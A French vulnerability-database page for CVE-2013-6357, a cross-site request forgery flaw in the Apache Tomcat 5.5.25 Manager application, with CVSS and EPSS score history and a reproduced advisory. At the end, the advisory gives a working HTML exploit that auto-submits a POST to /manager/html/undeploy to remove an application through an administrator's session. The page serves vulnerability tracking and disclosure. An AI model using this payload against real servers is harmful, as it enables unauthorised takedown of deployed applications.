CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Cross-site request forgery (CSRF) vulnerability in the Manager application in Apache Tomcat 5.5.25 and earlier allows remote attackers to hijack the authentication of administrators for requests that manipulate application deployment via the POST method, as demonstrated by a /manager/html/undeploy?path= URI. NOTE: the vendor disputes the significance of this report, stating that "the Apache Tomcat Security team has not accepted any reports of CSRF attacks against the Manager application ... as they require a reckless system administrator.
Cross-Site Request Forgery (CSRF) The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
6.8
AV:N/AC:M/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
9.81%
–
–
2022-03-20
–
–
9.81%
–
–
2022-04-03
–
–
9.81%
–
–
2022-05-01
–
–
9.11%
–
–
2023-03-12
–
–
–
0.09%
–
2023-03-26
–
–
–
0.08%
–
2023-05-14
–
–
–
0.08%
–
2023-10-01
–
–
–
0.12%
–
2023-12-31
–
–
–
0.12%
–
2024-02-11
–
–
–
0.07%
–
2024-02-18
–
–
–
0.07%
–
2024-04-21
–
–
–
0.07%
–
2024-06-02
–
–
–
0.07%
–
2024-06-23
–
–
–
0.07%
–
2024-08-04
–
–
–
0.07%
–
2024-08-11
–
–
–
0.07%
–
2024-09-22
–
–
–
0.12%
–
2024-10-20
–
–
–
0.12%
–
2024-12-08
–
–
–
0.12%
–
2024-12-22
–
–
–
0.12%
–
2025-01-26
–
–
–
0.12%
–
2025-02-09
–
–
–
0.17%
–
2025-01-19
–
–
–
0.12%
–
2025-01-25
–
–
–
0.12%
–
2025-02-16
–
–
–
0.17%
–
2025-03-18
–
–
–
–
0.68%
2025-03-30
–
–
–
–
0.68%
2025-04-15
–
–
–
–
0.68%
2025-04-15
–
–
–
–
0.68,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2013-11-03 23h00 +00:00 Auteur : Ivano Binetti EDB Vérifié : No
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Apache Tomcat 5.5.25 CSRF Vulnerabilities
# Date : 10-24-2013
# Author : Ivano Binetti (http://ivanobinetti.com)
# Author : Gianmarco Pirozzi (http://www.linkedin.com/pub/gianmarco-pirozzi/63/80b/2a5)
# Vendor site : http://tomcat.apache.org/
# Version : Apache Tomcat 5.5.25 and below (other versions could be affected)
# Tested on : Apache Tomcat 5.5.25
# Original Advisory : http://www.webapp-security.com/2013/11/apache-tomcat-5-5-25-deployundeploystartstop-applications/
# CVE-ID : CVE-2013-6357
+---------------------------------------------------------------------------------------------------------------------------------+
Summary
1)Introduction
2)Vulnerability Description
3)Exploit
3.1 Undeploy Applications
+---------------------------------------------------------------------------------------------------------------------------------+
1) Introduction
Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies.
The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process.
2) Vulnerability Description
Apache Tomcat 5.5.25 and below (other versions could be affected) is prone to a CSRF vulnerability affecting the Manager application
(which is the component utilized to start/stop/deploy/undeploy applications) in order to perform the following malicious activities:
- stop an existing application
- undeploy an existing application
- deploy a new application
In this Advisory I will only demonstate how to automatically undeploy an existing application.
3) Exploit
3.1 Undeploy Applications
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to Undeploy an Application</H2>
<form method="POST" name="form0" action="http://<tomcat_ip>:<tomcat_tcp/port>/manager/html/undeploy?path=/<name_of_application_to_undeploy>">
</form>
</body>
</html>
+----------------------------------------------------------------------------------------------------------------------------------+